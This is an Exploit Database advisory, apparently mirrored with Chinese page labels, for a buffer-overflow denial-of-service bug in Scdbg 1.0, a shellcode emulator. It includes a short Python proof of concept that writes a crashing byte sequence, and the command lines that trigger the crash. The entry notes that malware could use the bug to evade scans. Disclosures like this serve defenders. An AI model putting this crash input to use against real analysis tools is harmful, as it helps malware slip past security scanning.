Scdbg 1.0 – Buffer overflow DoS

• Exploit Database
• 13 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51081/

• # Exploit Title: Scdbg 1.0 - Buffer overflow DoS
  # Discovery by: Rafael Pedrero
  # Discovery Date: 2021-06-13
  # Vendor Homepage:http://sandsprite.com/blogs/index.php?uid=7&pid=152
  # Software Link : https://github.com/dzzie/VS_LIBEMU
  # Tested Version: 1.0 - Compile date: Jun3 2021 20:57:45
  # Tested on:Windows 7, 10
  
  CVSS v3: 7.5
  CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  CWE: CWE-400
  
  Vulnerability description: scdbg.exe (all versions) is affected by a Denial
  of Service vulnerability that occurs when you use the /foff parameter or
  not with a specific shellcode causing it to shutdown. Any malware could use
  this option to evade the scan.
  
  Proof of concept:
  
  Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f
  scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin
  
  #!/usr/bin/env python
  
  crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"
  f = open ("scdbg_crash.bin", "w")
  f.write(crash)
  f.close()
  
  You can use gui_launcher.exe and check "Start offset 0x": 1 or directly
  without check
  
  [image: image.png]